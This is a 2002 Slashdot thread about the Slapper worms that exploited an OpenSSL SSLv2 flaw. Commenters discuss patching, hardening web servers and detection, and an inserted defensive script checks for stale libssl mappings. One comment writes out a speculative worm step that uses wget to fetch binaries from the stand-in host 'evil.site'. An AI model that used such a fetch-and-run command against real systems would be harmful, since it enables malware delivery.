Posted by CmdrTaco on from the random-dune-reference-here dept.
randomErr writes "The worms, Slapper.B and Slapper.C, which exploit a known buffer overrun vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process, have infected thousands of Web servers worldwide, according to Helsinki-based F-Secure Corp., a computer and network security company."
1. That most system admins out there are bright enough to keep their machines up to date with the latest patches. ;)
2. Whoever is writing these worms knows how much damage they're doing to open source. It would have been preferable to inform the OpenSSL people first, wait a month, then release the worm.
Of course, by the time you read this, the bug will have been patched.
-- Why bother.
Re:A few hopes... by larien · Score: 5, Informative
The patches have been out for over a month, I'm pretty sure of that. I downloaded the patches as soon as Debian had the new ones online.
So, in short, it's an old bug, it's been patched, and the only ones getting hit are people who haven't patched their openssl libraries.
> It would have been preferable to inform the OpenSSL people first, wait a month, then release the worm.
Dear OpenSSL,
We are about to release an "internet worm" which will wreak havoc on the worldwide "internet" if you don't pay a ransom of... (place little finger on lower lip)...ONE BILLION DOLLARS!
Kind regards,
Dr Evil
Seriously though, I think I'm correct in saying that slapper exploits a flaw in OpenSSL patched well before the first slapper outbreak.
Re:A few hopes... by evilpenguin · Score: 5, Insightful
And any organization doing this sort of test is STILL vulnerable. That's the problem with trying to prove a negative. Just because an intrusion failed this time does not mean that it will next time. Now, I'm not arguing against performing the kind of assessment and audit you are talking about here, but such tests are only part of the process.
I'm a bit sad that this has turned into an "open source is STILL better than Windows" thing (even though I think it is). When it comes to security, everybody in the software game has problems. The finger pointing is useless. The lessons of this attack are exactly the same as the lessons of previous attacks, whether on closed or open code:
1. Software engineering needs to improve. The exploitable errors are patterns that keep on happening. As a programmer myself, I have made these mistakes. As a trade/guild/profession we need to take the time to learn these patterns and methods to avoid them. We (and I definitely include myself in this) are doing a lousy job.
2. Computer operations are doing a lousy job of keeping systems secure. This one is important, but less important than issue one, because system admins shouldn't have to patch systems constantly. That they have to is more a measure of the failures of software engineering than the failures of system admins. That said, until we programmers get our house in order, it does fall on admins to patch, patch, patch. This sounds simple, but it isn't. When you are talking about mission-critical systems, it is extremely dangerous to apply untested patches to production machines. So dangerous that good admins don't do it. They test patches on their test machines, and well run systems will go through applications regression testing for each set of patches. This takes time. Time during which the production systems run unpatched. Sometimes these patches come in stochastic bunches such that some patches go unapplied for months, simply because the patch came in after regression testing is too far along to start over. This leads to an ironic situation: The most critical systems to a business are often the most vulnerable. Judgement about whether a patch is for an issue so critical that it should short-circuit regression testing is a difficult art. And what if the production systems don't work after the patch? Sure, you can back up; you might keep your deployments in a CVS-like archive so you can roll back in minutes, but what if even a few minutes is a few hundred thousand dollars, or a few million? How many times can you afford the risk?
One problem with many of my fellow Free Software advocates (note I said "many" and not "all") is that they have not worked in mission-critical production environments in multi-billion dollar enterprises. Many of my fellow Open Source fans have worked in environments where it is no big deal to bring the server down for ten or fifteen minutes. When those are the only kind of shops you have worked in, it is difficult to understand how serious and difficult these issues can be for some.
So don't turn this into a Windows vs. Open Source thing. We (Open Source folks) have to suck it up this time. So what? The issues are the same. Our track record is still better, but, in this situation, the past is meaningless. Where are we now? Unfortunately we are in the same place (and so is the closed world): We are still making the same mistakes in software development and asking the admins to clean up the mess. We are even blaming the admins for it, when it really is not their fault.
All of this was triggered by the previous poster's correct comments about audit and assessment. He/She's right, except that these measures are locking the stable door after the horse has bolted (except sometimes the horse hasn't yet bolted -- that's why you still do it). The problem is we software developers have made a stable door that you can walk away from with it unlocked. If we hadn't done that in the first place...
It is getting better. I'm seeing more books on programming to avoid security problems. We're learning. But there are a lot of us, and we aren't all getting the education.
use chkrootkit to see if you've gotten it by motorsabbath · Score: 5, Informative
http://www.chkrootkit.org/
version 0.37 has been updated to find the slapper - JB
> This is the sort of thing that makes open source (and linux) look amateurish, unprofessional, and insecure.
I wonder how Windows must look then. Yikes!
-- Jim
Same mantra applies to Linux and MS sysadmins: by bittmann · Score: 5, Informative
1) Don't enable services and features you don't need (or in MS sysadmin speak--DISABLE all of the services and features you don't need that have "helpfully" been activated in the base install); and
2) Keep up to date on your patch levels.
You don't have to be bleeding-edge on patches, but when a security vulnerability with malicious code in the wild has been detected, it's time to *DO* something about it!
Really, I wonder how many of these infected websites were actually USING SSL, as opposed to having that port hot but unused...
Re:Same mantra applies to Linux and MS sysadmins: by petard · Score: 5, Informative
I would add the following:
3) Don't install a development environment (e.g. gcc, which is required for this worm to propagate) on a publicly exposed web server!
Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated :-).
If you must use a compiler on your web server, FFS run the publicly accessible service in a chroot jail!
-- .sig: file not found
Re:Same mantra applies to Linux and MS sysadmins: by slamb · Score: 5, Insightful
> 3) Don't install a development environment (e.g. gcc, which is required for this worm to propagate) on a publicly exposed web server!
> Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated :-).
I keep seeing this comment, and every time I think how stupid it is. The compiler is not the security flaw. Given the number of comments like this, I fully expect the next version of this worm to have a "|| wget http://evil.site/worm-`uname -s`-`uname -m`" in place, and evil.site to have statically linked binaries. Then people will be saying "You don't need wget on a production webserver!" or some stupid shit like that. And it will move on to something else. They're already running code on your computer. You're already screwed.
(Isn't the first piece of the exploit written in assembler, as is typical for buffer exploits? Then they have to have targeted your platform specifically anyway. I just don't see why the compiler stage is necessary at all. They can just transfer the larger chunk of worm executable in the same way they transferred the source code.)
The real solution is to secure your system in the first place: disable services you aren't using. Patch ones you are. Given the month between the patch and the exploit, anyone following this practice will be unaffected.
Re:Same mantra applies to Linux and MS sysadmins: by petard · Score: 5, Insightful
It's not stupid at all. You are correct in stating that the compiler is not the security flaw. However, if the compiler were not there, this is the 4th worm in the past few months that you wouldn't have been vulnerable to. Simply because they *could* find other means of implementing the worm doesn't mean that you should make this one easy. There are 2 goals here:
Prevent compromise. This is done by disabling unnecessary services and keeping your patch levels current, among other things.
Reduce the impact of compromises that do occur. One way to do this is, much as you disable unnecessary services, only keep the software needed for your application on the box.
As "stupid" as it may seem from an ivory tower perspective, in practice it helps. It's not a first line of defense, but it helps.
-- .sig: file not found
CERT Advisory by Anonymous Coward · Score: 5, Informative
http://www.cert.org/advisories/CA-2002-27.html
what does it look like? by Anonymous Coward · Score: 5, Interesting
What should I look for in my apache logs to see if I'm being "hit" by it? Anyone have an example?
your friendly neighborhood AC
Re:what does it look like? by KMitchell · Score: 5, Informative
You'll get some additional stuff in your access log and potentially error log but the telltale sign that (on a patched system) someone is pinging you for the exploit is something like this in your ssl_error_log:
It's a distro problem, not a linux problem by tshoppa · Score: 5, Insightful
The problem is that many (most? all?) the big-name distros have Apache built with mod_ssl on them. Even though I would guess that only a tiny percent of all web servers need SSL. (Admittedly that tiny percent is very important, as no money transactions should be going on without security...)
IMHO if you need SSL on a webserver, you should be forced to go through the download + build + cert process yourself.
How to test yourself by pbur · Score: 5, Informative
If you were like me and wondered if after the OpenSSL upgrade that you actually patched everything right, you can compile and run this program to find out:
http://cert.uni-stuttgart.de/advisories/openssl-sslv2-master/openssl-sslv2-master.c
It will connect to your HTTPS server and check it. Unfortunately, it won't connect to SSH. It helped me make sure I was patched up at least for apache.
And I have never quite understood why the advisory says to recompile your apps as well. If they are using the Shared Library, where the problem actually exists, then they get the upgrade by default. Now, if you had some static compiles, then sure.
Pbur
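The recompile question above has a companion check the thread leaves out, added here as an example that is not from the post or from the Stuttgart checker: a new libssl on disk does not reach an httpd that was started before the upgrade, because that process still maps the old (now unlinked) file, which Linux marks "(deleted)" in /proc/PID/maps. The sh below lists such stale OpenSSL mappings; it assumes Linux /proc and a package upgrade that replaced the file rather than overwriting it in place, and its sample maps text is constructed.

```shell
#!/bin/sh
# Added example, not code from the thread. Assumes Linux /proc and a package
# upgrade that replaced libssl/libcrypto on disk (dpkg/rpm unlink the old file,
# so a process still mapping it shows "(deleted)" in /proc/PID/maps).

# Read one maps file on stdin; print each distinct stale OpenSSL library path.
# Exit status is 0 when at least one stale mapping was found, 1 otherwise
# (the final "grep ." turns "no output" into a non-zero status).
stale_ssl_maps() {
    grep -oE '/[^ ]*lib(ssl|crypto)[^ ]*\.so[^ ]* \(deleted\)$' | sort -u | grep .
}

# Walk every process; list the ones that need a restart to pick up the fix.
# Returns 0 if any such process was found, 1 if the box is clean.
report_stale_processes() {
    found=1
    for maps in /proc/[0-9]*/maps; do
        pid=${maps#/proc/}; pid=${pid%/maps}
        stale=$(stale_ssl_maps 2>/dev/null < "$maps") || continue
        name=$(cat "/proc/$pid/comm" 2>/dev/null || echo '?')
        printf 'PID %s (%s) still maps: %s\n' "$pid" "$name" "$stale"
        found=0
    done
    return $found
}

# Constructed sample of /proc/PID/maps for a daemon started before the
# upgrade: the old libssl appears twice (two segments), libcrypto once,
# libc is current. Version strings are placeholders, not real file names.
SAMPLE_STALE='7f000000-7f010000 r-xp 00000000 08:01 1234 /usr/lib/libssl.so.0.9.6 (deleted)
7f010000-7f011000 rw-p 00010000 08:01 1234 /usr/lib/libssl.so.0.9.6 (deleted)
7f020000-7f030000 r-xp 00000000 08:01 1235 /usr/lib/libcrypto.so.0.9.6 (deleted)
7f040000-7f050000 r-xp 00000000 08:01 1236 /lib/libc.so.6'

# Same daemon after a restart: the new library is mapped, nothing is stale.
SAMPLE_FRESH='7f000000-7f010000 r-xp 00000000 08:01 2234 /usr/lib/libssl.so.0.9.6
7f020000-7f030000 r-xp 00000000 08:01 2235 /usr/lib/libcrypto.so.0.9.6
7f040000-7f050000 r-xp 00000000 08:01 1236 /lib/libc.so.6'

# Scan the live system only when asked, so the file is safe to source.
if [ "${1:-}" = "--scan" ]; then
    report_stale_processes
fi
```

Run it as `sh stale-ssl.sh --scan` after the upgrade; every PID it prints is a process that needs a restart, which is the case the "recompile your apps" advice is really about for dynamically linked binaries.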
We're not really catching up by Anonymous Coward · Score: 5, Insightful
Code Red infected at least 400,000 Microsoft systems. I think it infected 40,000 in the first day. Nimda got something like 65,000 plus. Slapper has infected 7,000 to 11,000, depending upon who you listen to. Now take into consideration that Linux Apache systems host a significantly larger number of web sites than Windows systems do.
Slapper is a minor event. I see a constant stream of Microsoft security alerts go through my mailbox, and you don't hear a peep out of these Microsoft apologists and cheerleaders until a serious Open Source vulnerability occurs once or twice a year.
All complex software will have bugs. It seems to me that Open Source bugs get fixed quicker, and Open Source admins are more inclined to patch in a timely manner than Microsoft ones by at least one order of magnitude. What do you expect from Windows, though, when its target market is people who don't know how to use computers.
Re:We're not really catching up by catfood · Score: 5, Insightful
More importantly, Open Source problems stay visible until they are fixed. There's no hiding behind STO, no stonewalling.
Have you noticed how many pre-emptive security patches are made by Open Source developers? Where the announcements start with "someone pointed out this security flaw, and they were right, and we wanted to fix it before the exploits get created"? The "someone pointed out" part is a big deal. You can't get that with closed source vendorware, not proactively. As a result, security problems are frequently fixed long before they cause any problems at all.
Re:The Worm by chrysrobyn · Score: 5, Insightful
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
I am the administrator for two Linux servers, a Slackware 7.0 box and a Debian Woody box. I'm scared that I'll get rooted again, but do you know what I'm thinking anyway? "Bring it on." Let these worms propagate, let some publicity get out, and let the patches come. They will come, just as they always have. I'll be a wget %1;upgradepkg %1 or apt-get update;apt-get upgrade away from being back up to speed.
The open-source community, contrary to your assertion, has for years said two things 1) Lazy admins risk getting hacked and 2) Open source patches flow more freely than closed source ones. I don't think the number of holes against NT 4.0 (for example) is criticised, but rather the length of time between exploit and patch-- the criticism is of the number of documented, unpatched holes. If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon. Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows and resort to childish retorts and pleas for silence.
Bring it on, hackers, help us audit the code. Win prestige for you, win a better OS for us.
"Wget"ing its source by N+Monkey · Score: 5, Interesting
From the article:
According to researchers at F-Secure, the Slapper.B worm variant is able to retrieve its source code from a Web page after the worm has been removed from infected servers. The worm uses a common free software utility, wget, to retrieve its source code from an infected Web page in the home.ro domain.
Administrators of the domain, which is located in Romania, have been notified and the infected page has been deleted from the site, according to F-Secure.
Rather than simply having deleted the page, I wonder if it would have been possible to replace this source code with something else that acted as an "antibody"?
Ah, but it's not an Apache exploit, but an SSLv2 exploit, no? Not every server running Apache is going to be running the SSL stuff as well. So suddenly, it's a bit smaller pool of boxes, and the 'installed base' thing comes back into prominence.
-- Vintage computer games and RPG books available. Email me if you're interested.
Every time I hear about another buffer overflow, I scratch my head and ask, "Why doesn't anybody use libsafe?" This is a library which, once installed, protects all processes, regardless of whether they have been patched or not.
It transparently replaces the libc functions that are the usual targets of stack smashing attacks, and checks whether the stack frame has been overrun. If the stack has been smashed, the process gets terminated forcefully, and root (or other designated contact) gets an e-mail with all the details.
This has been out for several years now, and I am amazed that no major distribution includes this in a standard server install.
-Steve
-- Hey, Windows users, there is no such thing as "forward" slash, there is only slash and backslash.
... we're starting to catch up with Microsoft in the vital worm-propagation field, where they've been unmatched for years. :-)
Laugh, it's a joke
- sig? who is this sig of which you speak?